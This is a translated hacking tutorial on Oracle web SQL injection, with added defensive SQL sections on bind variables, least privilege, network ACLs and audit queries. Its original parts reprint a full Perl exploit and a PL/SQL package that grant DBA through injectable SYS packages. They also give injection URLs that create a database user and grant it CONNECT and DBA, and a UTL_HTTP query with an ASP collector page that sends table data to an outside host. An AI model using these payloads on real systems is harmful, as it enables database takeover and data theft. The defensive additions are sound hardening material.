ART of Web-sql-injection 2nd Volume: Oracle Chapter

Tags: dba, mssql, sql injection
Article Author: kj021320
Source of information: Evil Octal Information Security team (www.eviloctal.com)

Note: This article was first published by the I.S.T.O technical team; the original author afterwards submitted it to the Evil Octal Information Security Team forum as a courtesy.
Author: kj021320
Team: I.S.T.O
A lot of people talk about ASP, PHP or JSP injection. In fact, injection is most directly a matter of the database; the scripting language is only a secondary factor.
For example, ASP/ASPX and JSP impose no restrictions at all, while PHP will escape ' to \' , but if the database is not MySQL, PostgreSQL or SQLite, that escaping does nothing!
Still, I don't think any of these scripting languages is really strict, and with CFM there is no leniency at all! For details on the specific databases, refer to
ART of Web-sql-injection Volume 1. Thanks to Amxsa and i.c.e for their continued support.

OK, to the point. Abroad, attacks on Oracle have received plenty of attention, but domestically few people research it, or the skills aren't there yet. So I'll fire the first shot!
SQL injection comes down to the database's SQL parsing engine, and Oracle does not support executing multiple statements in one call!
If you use tools like PL/SQL Developer you can separate statements with ; and run several at once,
but that is only because the tool splits them up and submits each statement separately.
Abroad, a number of attacks on Oracle have been proposed, but few of them can be used for web SQL injection!
Early on, NGS and Argeniss proposed the function/procedure injection approach:
SQL injection inside functions or stored procedures that users have defined.
Take an MSSQL function as an example:
CREATE FUNCTION isto_kj021320 (@sql varchar(100))
RETURNS int
BEGIN
    EXEC('SELECT * FROM KJ021320 WHERE name=''' + @sql + '''');  -- @sql is concatenated into the statement unfiltered
END
The @sql parameter above is not filtered at all, so the function is plainly SQL-injectable!
In Oracle the same approach is particularly noteworthy, starting with user-defined functions and moving on to system functions.
The functions inside the system packages generally operate on system tables that ordinary users have no way to query,
but by calling these system functions you can obtain the corresponding information.
Oracle's privilege model is easy to understand:

User ---> calls a function (which inherits the privileges of the function's creator) ---> performs the operation
So all we need to do is change the operation inside the function to adding users, creating DBAs, and so on...
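To make the definer's-rights point concrete, here is an added example that is not from the original article or from any of the cited exploits: the same injectable pattern as the MSSQL function, written in PL/SQL, followed by the form a reviewer would accept. The schema name app, the table kj021320 (borrowed from the MSSQL example above) and the function names are assumptions.

```sql
-- Added example, not part of the original article. Schema APP, table
-- APP.KJ021320 and the function names are assumed for illustration.

-- Vulnerable: the caller's input is spliced into the SQL text. A PL/SQL unit
-- runs with its owner's privileges by default (definer's rights), so whatever
-- the string contains executes as APP, not as the caller. This is the pattern
-- the article describes for SYS-owned packages.
CREATE OR REPLACE FUNCTION app.lookup_by_name_bad (p_name IN VARCHAR2)
  RETURN NUMBER
IS
  v_count NUMBER;
BEGIN
  EXECUTE IMMEDIATE
    'SELECT COUNT(*) FROM app.kj021320 WHERE name = ''' || p_name || ''''
    INTO v_count;
  RETURN v_count;
END;
/

-- Hardened: the same query, but the value travels as a bind variable and can
-- never change the statement's structure. AUTHID CURRENT_USER additionally
-- makes the unit run with the caller's privileges rather than the owner's,
-- so an injection elsewhere cannot borrow APP's rights through it.
CREATE OR REPLACE FUNCTION app.lookup_by_name (p_name IN VARCHAR2)
  RETURN NUMBER
  AUTHID CURRENT_USER
IS
  v_count NUMBER;
BEGIN
  EXECUTE IMMEDIATE
    'SELECT COUNT(*) FROM app.kj021320 WHERE name = :1'
    INTO v_count
    USING p_name;
  RETURN v_count;
END;
/

-- When an identifier (not a value) must be dynamic it cannot be bound, so
-- validate it instead of quoting by hand: DBMS_ASSERT.SIMPLE_SQL_NAME raises
-- ORA-44003 on anything that is not a plain SQL name, including quotes,
-- semicolons and '||'.
CREATE OR REPLACE FUNCTION app.count_rows (p_table IN VARCHAR2)
  RETURN NUMBER
  AUTHID CURRENT_USER
IS
  v_count NUMBER;
BEGIN
  EXECUTE IMMEDIATE
    'SELECT COUNT(*) FROM app.' || DBMS_ASSERT.SIMPLE_SQL_NAME(p_table)
    INTO v_count;
  RETURN v_count;
END;
/
```

With the invoker's-rights versions, a caller needs its own SELECT privilege on app.kj021320; that is the intended effect, because the function no longer acts as a privilege bridge between the caller and the owner.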

milw0rm, SecurityFocus, Red Database Security... the published methods are stated very briefly: they give the exploit and don't explain the principle behind it.
I'll explain it in this reprint.
For example, the following official advisory:
the Activate_subscription function in the DBMS_CDC_SUBSCRIBE package has a stored injection.
OK, the exploit published on milw0rm is written in Perl:

use warnings;
use strict;
use DBI;
use Getopt::Std;
use vars qw/%opt/;

sub usage {
print <<"USAGE";

Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> -g|-r [-P <port>]
Options:
  -h <host>     target host
  -s <sid>      target SID name
  -u <user>     user
  -p <passwd>   password

  -g|-r         (g)rant DBA to user | (r)evoke DBA from user
  [-P <port>    Oracle port]

USAGE
exit 0
}

my $opt_string = 'h:s:u:p:grP:';
getopts($opt_string, \%opt) or &usage;
&usage if (!$opt{h} or !$opt{s} or !$opt{u} or !$opt{p});
&usage if (!$opt{g} and !$opt{r});
my $user = uc $opt{u};

# connect with the ordinary credentials given on the command line
my $dbh = undef;
if ($opt{P}) {
    $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die;
} else {
    $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die;
}

my $sqlcmd = "GRANT DBA TO $user";
print "[-] wait...\n";

# -r: undo the grant
if ($opt{r}) {
    print "[-] revoking DBA from $user...\n";
    $sqlcmd = "REVOKE DBA FROM $user";
    $dbh->do($sqlcmd);
    print "[-] done!\n";
    $dbh->disconnect;
    exit
}

# a function in the user's own schema whose body is the GRANT statement
print "[-] creating evil function...\n";
$dbh->do(qq{
CREATE OR REPLACE FUNCTION OWN return number
authid current_user as
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE '$sqlcmd'; COMMIT;
return(0);
END;
});

# the SYS-owned procedure evaluates the injected function call
print "[-] go ... (don't worry about errors)!\n";
my $sth = $dbh->prepare(qq{
BEGIN
SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION('''||$user.OWN||''');
END;
});
$sth->execute;
$sth->finish;
print "[-] YOU GOT THE POWAH!!\n";
$dbh->disconnect;
exit

-------


The method above first creates a function called OWN whose body is
GRANT DBA TO $user, which gives DBA authority to a user!
It is then passed into a stored procedure that has an injection:
SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION(... the OWN function ...);
Because
the ACTIVATE_SUBSCRIPTION method is injectable,
the OWN function gets executed directly and the privilege is added.
This demonstration requires creating a function first! But in web SQL injection we cannot write multiple SQL statements to create a function!
So what can we do?
Of course, the injection in ACTIVATE_SUBSCRIPTION can also be closed off by the statements that follow it, just like our web SQL injection.
As for how to detect Oracle function injection, next time I'll write an article titled <<Testing function injection in Oracle>>.

With the principle introduced, let's begin the practical part!
Remember that many articles say that if the SQL statement is written like this,
Sqlstr="BEGIN select * from kj021320 where name=$name;";
you can execute multiple statements! Actually, that's nonsense! What code nowadays is written like that? Normally you operate on SQL directly:
Sqlstr="SELECT * from kj021320 where name=$name";
So in Oracle web SQL injection you can only use functions; stored procedures cannot be used! For the specific reason, go and read the documentation.

There is an injection point on the web:
http://127.0.0.1:8080/VOA/test.jsp?id=282, a numeric parameter.
So first let's confirm the user's privileges:
http://127.0.0.1:8080/VOA/test.jsp?id=282 and exists (SELECT * from Dba_tables)
Here is a small detail
about Oracle's system views.
Only users with the DBA privilege can access the views beginning with DBA_, such as DBA_USERS and DBA_TABLES,
while an ordinary user can query
USER_TABLES and ALL_TABLES. The former lists the user's own tables; the latter lists the user's own tables plus the tables the user is authorized to query!
General injection tools only need to query these two views to obtain the user's table structure.
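The exists(SELECT * FROM dba_tables) probe above is really a privilege check on the account the web application connects with. As an added example that is not from the original article, here is how a DBA would provision that account so the probe answers FALSE and stays FALSE, and how to verify it. The user voa_app, the schema app and the table kj021320 are assumed names.

```sql
-- Added defensive example, not part of the original article.
-- VOA_APP, APP and APP.KJ021320 are assumed names.

-- Provision the web tier's account with the minimum it needs: the ability to
-- log in plus object-level grants on the tables the pages actually read.
CREATE USER voa_app IDENTIFIED BY "change-me-at-deploy-time";
GRANT CREATE SESSION TO voa_app;
GRANT SELECT ON app.kj021320 TO voa_app;
-- Deliberately NOT granted: the CONNECT/RESOURCE roles, SELECT ANY DICTIONARY,
-- SELECT ANY TABLE, or EXECUTE on SYS network packages. Whatever an injected
-- query can reach is exactly this account's privilege set, nothing more.

-- Verify from a VOA_APP session: this list should contain only CREATE SESSION.
SELECT privilege FROM session_privs;

-- The dictionary views the article names should be out of reach; for VOA_APP
-- each of these fails with ORA-00942 (table or view does not exist), which is
-- why the injected "and exists (select * from dba_tables)" evaluates FALSE.
SELECT COUNT(*) FROM dba_tables;
SELECT COUNT(*) FROM dba_users;

-- From a DBA session, periodically review everything an application account
-- holds beyond its own schema. Any row here is what a successful injection gets.
SELECT privilege AS granted
  FROM dba_sys_privs
 WHERE grantee = 'VOA_APP'
UNION ALL
SELECT granted_role
  FROM dba_role_privs
 WHERE grantee = 'VOA_APP'
UNION ALL
SELECT privilege || ' ON ' || owner || '.' || table_name
  FROM dba_tab_privs
 WHERE grantee = 'VOA_APP';
```

The last query is the one to keep in a scheduled check: a web account that suddenly shows DBA, SELECT ANY DICTIONARY, or EXECUTE on a SYS package has either been misconfigured or is the outcome of the kind of escalation described later in the article.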

Back to the injection above: it will generally return FALSE!
That doesn't matter; whatever privileges we have, we can still inject.
So how do we now confirm where the Oracle host is located, that is, whether its IP is the same machine as the web server?
We use
the REQUEST function in the UTL_HTTP package.
Example:
SELECT utl_http.request('http://www.isto.cn/getdata.asp?data=' || table_name) FROM User_tables WHERE rownum<=1
It will send the data out as a URL request! For the remote data calls that large databases offer, see
ART of Web-sql-injection Volume 1.

So how do we construct this injection? Very simple!
http://127.0.0.1:8080/VOA/test.jsp?id=282 and '1' in (SELECT utl_http.request('http://www.isto.cn/getdata.asp?data='||table_name) from User_tables)
Like this!
However, we have to build a page to receive the request parameter! A simple ASP implementation:
<%
If Request("data") = "" Then
    ' no data parameter: show everything collected so far
    Response.Write Application("Oracle_data")
Else
    Dim DataValue
    DataValue = Request.ServerVariables("REMOTE_HOST") & " Data:" & Request("data") & "<br>"
    If Request("clear") <> "" Then
        Application("Oracle_data") = DataValue
    Else
        Application("Oracle_data") = Application("Oracle_data") & DataValue
    End If
End If
%>
Unless his database is on an intranet, we can get his IP address and the data; pulling tables this way is fast too!

Next, with his IP we can scan for his Oracle port; the SID can be retrieved with a SELECT query or detected with tnscmd!

I'll be a bit more direct here!
Let's take a 0day published abroad in 2006,
Get_domain_index_tables, though there seems to be no further usage information about it abroad.
That's it; look at the explanation.
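The UTL_HTTP channel just described only works because the database account the web application uses is allowed to open outbound connections. As an added example that is not from the original article, here are the controls and checks a DBA applies on that side: inventory of who can execute the network packages, the grant reduction, the per-host network ACL that Oracle 11g and later require, and auditing. The schema name APP, the ACL file name app_http.xml and the host api.example.com are assumptions.

```sql
-- Added defensive example, not part of the original article.
-- APP, app_http.xml and api.example.com are assumed names.

-- 1. Inventory: which SYS network packages can every account execute?
--    On 10g-era installs these are granted to PUBLIC by default, which is what
--    lets an injected query in a low-privilege session call utl_http.request.
SELECT grantee, table_name, privilege
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND grantee = 'PUBLIC'
   AND privilege = 'EXECUTE'
   AND table_name IN ('UTL_HTTP', 'UTL_TCP', 'UTL_SMTP', 'UTL_INADDR', 'UTL_FILE');

-- 2. Least privilege: remove the blanket grant and give it back only to the
--    schema that genuinely needs outbound HTTP.
REVOKE EXECUTE ON SYS.UTL_HTTP FROM PUBLIC;
GRANT  EXECUTE ON SYS.UTL_HTTP TO app;

-- 3. Oracle 11g and later additionally gate every outbound connection behind a
--    network ACL; with no matching ACL the call fails with ORA-24247 even for
--    accounts that can execute the package. Allow APP to reach one host on one
--    port and nothing else.
BEGIN
  DBMS_NETWORK_ACL_ADMIN.CREATE_ACL(
    acl         => 'app_http.xml',
    description => 'HTTP egress for APP',
    principal   => 'APP',
    is_grant    => TRUE,
    privilege   => 'connect');
  DBMS_NETWORK_ACL_ADMIN.ASSIGN_ACL(
    acl        => 'app_http.xml',
    host       => 'api.example.com',
    lower_port => 443,
    upper_port => 443);
  COMMIT;
END;
/

-- 4. Visibility: record every execution of the package, so a caller that
--    should never make HTTP requests (the web application's account, sending
--    table names in a query string) appears in DBA_AUDIT_TRAIL.
AUDIT EXECUTE ON SYS.UTL_HTTP BY ACCESS;

-- 5. Verify from a session that should NOT have egress. The expected outcome
--    is an error, ORA-24247 (blocked by ACL) or ORA-00904 (the package is no
--    longer resolvable because EXECUTE was revoked), never a response body.
SELECT utl_http.request('http://api.example.com/') FROM dual;
```

The object audit in step 4 only produces rows when the instance's AUDIT_TRAIL parameter is set to write the trail (DB or DB,EXTENDED); on a default 10g install it is NONE, so check that first, otherwise the statement succeeds silently and records nothing.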

CREATE OR REPLACE
PACKAGE mybadpackage AUTHID CURRENT_USER
IS
  FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.ODCIIndexInfo, p3 VARCHAR2,
                                 p4 VARCHAR2, env SYS.ODCIEnv)
    RETURN NUMBER;
END;
/
CREATE OR REPLACE PACKAGE BODY mybadpackage
IS
  FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.ODCIIndexInfo, p3 VARCHAR2,
                                 p4 VARCHAR2, env SYS.ODCIEnv)
    RETURN NUMBER
  IS
    PRAGMA AUTONOMOUS_TRANSACTION;
  BEGIN
    EXECUTE IMMEDIATE 'GRANT DBA TO HACKER';
    COMMIT;
    RETURN(1);
  END;
END;
/
DECLARE
  index_name   VARCHAR2(200);
  index_schema VARCHAR2(200);
  type_name    VARCHAR2(200);
  type_schema  VARCHAR2(200);
  version      VARCHAR2(200);
  newblock     PLS_INTEGER;
  gmflags      NUMBER;
  v_return     VARCHAR2(200);
BEGIN
  index_name := 'A1';  index_schema := 'HACKER';
  type_name := 'mybadpackage';  type_schema := 'HACKER';
  version := '10.2.0.2.0';  gmflags := 1;
  v_return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(
    index_name   => index_name,
    index_schema => index_schema,
    type_name    => type_name,
    type_schema  => type_schema,
    version      => version,
    newblock     => newblock,
    gmflags      => gmflags
  );
END;
/

The specific injection point is the 3rd parameter.
This time I'm not using the function form;
I insert the SQL statement directly inside:

SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO', 'BAR', 'dbms_output').Put(:P1); EXECUTE IMMEDIATE 'DECLARE PRAGMA autonomous_transaction; BEGIN EXECUTE IMMEDIATE 'CREATE USER KJ021320 identified by KJ021320'; end;'; end;--', 'SYS', 0, '1', 0)
That's how you create a user!
We construct the SQL:

http://127.0.0.1:8080/VOA/test.jsp?id=282 and ''||SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO', 'BAR', 'dbms_output').Put(:P1); EXECUTE IMMEDIATE 'DECLARE PRAGMA autonomous_transaction; BEGIN EXECUTE IMMEDIATE 'CREATE USER KJ021320 identified by KJ021320'; end;'; end;--', 'SYS', 0, '1', 0)=''
Submitting this creates a user KJ021320 with the password KJ021320.
The user has been created but still cannot log in ~~ so first give this user the privilege to connect:
http://127.0.0.1:8080/VOA/test.jsp?id=282 and ''||SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO', 'BAR', 'dbms_output').Put(:P1); EXECUTE IMMEDIATE 'DECLARE PRAGMA autonomous_transaction; BEGIN EXECUTE IMMEDIATE ''GRANT CONNECT to KJ021320'; end;'; end;--', 'SYS', 0, '1', 0)=''
Then grant DBA the same way! Now that you are Oracle's DBA, what ways are there to write a local file and get a shell?
There are many! Not to mention backups; Pro*C and SQLJ all work! I'll leave that to you!
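The two SYS packages the article leans on, DBMS_CDC_SUBSCRIBE and DBMS_EXPORT_EXTENSION, share one property: they run with SYS's privileges and, on unpatched 9i/10g, were executable by PUBLIC. As an added example that is not from the original article, here is the inventory a DBA runs to confirm whether that is still the case, the grant reduction, and the detection queries for the three footprints the payloads above leave (a new account, a CONNECT or DBA grant, and privileged DDL from the application session). The exclusion list of known administrators is an assumption to extend for your environment.

```sql
-- Added defensive example, not part of the original article.

-- Inventory: are the definer's-rights SYS packages from the article still
-- executable by every account? Applying the Critical Patch Update fixes the
-- injection itself, but an application account has no business calling
-- export or change-data-capture internals at all.
SELECT table_name, grantee, privilege
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND grantee = 'PUBLIC'
   AND privilege = 'EXECUTE'
   AND table_name IN ('DBMS_EXPORT_EXTENSION', 'DBMS_CDC_SUBSCRIBE', 'DBMS_CDC_PUBLISH');

REVOKE EXECUTE ON SYS.DBMS_EXPORT_EXTENSION FROM PUBLIC;
REVOKE EXECUTE ON SYS.DBMS_CDC_SUBSCRIBE   FROM PUBLIC;

-- Detection (a): an account that appeared outside change control. The
-- injected CREATE USER leaves a fresh CREATED timestamp in DBA_USERS.
SELECT username, created, account_status
  FROM dba_users
 WHERE created > SYSDATE - 7
 ORDER BY created DESC;

-- Detection (b): a CONNECT or DBA grant to a non-administrative account.
-- The assumed exclusion list must be extended with your own known admins.
SELECT grantee, granted_role, admin_option
  FROM dba_role_privs
 WHERE granted_role IN ('DBA', 'CONNECT')
   AND grantee NOT IN ('SYS', 'SYSTEM', 'SYSMAN')
 ORDER BY granted_role, grantee;

-- Detection (c): privileged DDL issued through the web tier's own session.
-- Statement auditing of user management and of system/role grants records the
-- issuing user, client host and timestamp, so a CREATE USER or GRANT DBA that
-- arrives from the application account and its web server stands out.
AUDIT USER BY ACCESS;          -- CREATE USER, ALTER USER, DROP USER
AUDIT SYSTEM GRANT BY ACCESS;  -- GRANT/REVOKE of system privileges and roles

SELECT timestamp, username, userhost, action_name, obj_name, returncode
  FROM dba_audit_trail
 WHERE action_name IN ('CREATE USER', 'GRANT ROLE', 'SYSTEM GRANT')
 ORDER BY timestamp DESC;
```

Queries (a) and (b) need no prior configuration and are cheap enough to run from a monitoring job every few minutes; the RETURNCODE column in (c) is worth keeping in the output, because a burst of failed attempts (non-zero codes) from the application account is the earliest signal that someone is working through payloads of the kind shown above.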

Video demo: Http://www.isto.cn/vedio/artwebinj-oracle.rar

PS: Before this, Superhei told me that several of the MSSQL techniques I used had already been published by someone else! So depressing! It seems I'm not only ignorant but naive! Publication timing really is the key issue! Oh well, I guess nobody in the country has published this one yet, right? I can call myself the father of Oracle web SQL injection in China, haha! Enough bragging, done! -_-